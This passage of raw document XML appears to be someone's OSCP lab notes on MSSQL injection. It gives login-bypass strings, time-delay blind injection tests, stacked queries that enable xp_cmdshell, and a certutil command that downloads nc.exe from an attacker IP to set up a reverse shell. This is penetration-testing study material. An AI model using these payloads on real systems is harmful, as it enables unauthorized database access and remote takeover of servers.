        <w:t xml:space="preserve">Put this in username to log in as admin or try any other username</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001740">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="735"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">admin' #</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001741">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="735"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">admin' --</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001742">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="735"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">admin' -- -</w:t>
      </w:r>
    </w:p>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45">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_ac7zo345unf4" w:id="192"/>
      <w:bookmarkEnd w:id="192"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Manual Code Execution for SQL (SQL Injections)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001746">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001747">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_e2iucmkox5js" w:id="193"/>
      <w:bookmarkEnd w:id="193"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Enabling command execution with xp_cmdshell through website </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">(only works for mssql)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001748">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">I didn't know this before but xp_cmdshell command execution only exists on mssql. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001749">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000174A">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Also taught in</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> OSCP 10.3.1. Manual Code Execution</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000174B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000174C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This was seen in the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">MedTech Challenge lab</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. We saw a login page that showed a SQL error when you put in a single quote (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">'</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) for the username. But then after trying UNION-based SQL injection, it wouldn't display a table so we test for blind SQL injection and we confirmed there was SQL injection but there is simply no table output.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000174D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000174E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:hyperlink r:id="rId475">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">PortSwigger</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> has a section on testing for SQL injection using time-delays, and it worked here too. This is another way to confirm blind SQL injection. This one is for MSSQL only but more can be found on the </w:t>
      </w:r>
      <w:hyperlink r:id="rId476">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">portswigger SQL cheatsheet</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000174F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="698"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">'; IF (1=2) WAITFOR DELAY '0:0:10'--</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001750">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="698"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Doesn't delay at all </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001751">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="698"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">'; IF (1=1) WAITFOR DELAY '0:0:10'--</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001752">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="698"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">It delays for 10 seconds, confirming there is SQL injection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001753">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="698"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">'WAITFOR DELAY '0:0:10'--</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001754">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="698"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Simply doing this also works</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001755">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001756">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001757">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">But, we don't need visual output to get manual code execution, so we did this:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001758">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001759">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">';EXEC sp_configure 'show advanced options',1;--</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000175A">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">';RECONFIGURE;--</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000175B">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">';EXEC sp_configure 'xp_cmdshell',1;--</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000175C">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">';RECONFIGURE;--</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000175D">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Or just this</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000175E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="938"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">'; EXEC sp_configure 'show advanced options',1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell',1; RECONFIGURE;--</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000175F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="867"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">But this only works when they allow you to stack multiple commands at once, which not all systems do</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001760">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001761">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1028"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The syntax</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> '; </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">means first use a quote to end the original query string, and then use semicolon to officially end the entire statement and get ready to start a new one</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001762">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001763">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Also I tried the whole process with only ' and not any ; and it worked. I think the ; was unnecessary and most sql injection guides don't include it. But good to include just in case</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001764">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001765">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You can try using </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">tcpdump </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">to see if the command execution worked, and see if you can reach your Kali from victim (tested this on Medtech .121 and it works)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001766">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1413"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo tcpdump -i tun0 icmp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001767">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1413"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">'; EXEC xp_cmdshell 'ping -n 3 192.168.45.232';--</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001768">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001769">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">It's possible that the command execution worked but you get no response on the tcpdump. This is because the victim machine might be in a different subnet or not allowed to access Kali IP. So to see if command execution worked, you can try pinging localhost and seeing if it stalls. If it stalls, then command execution works. Now, as shown in </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">OSCP-B .148</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, try sending a reverse shell to a pivot which forwards the rev shell back to you. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000176A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="510"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">'; EXEC xp_cmdshell 'ping -n 6 127.0.0.1';--</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000176B">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000176C">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Get reverse shell:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000176D">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">';EXEC xp_cmdshell 'certutil -urlcache -f </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">http://192.168.45.232:80/nc.exe</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> C:\windows\temp\nc.exe';--</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000176E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1059"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
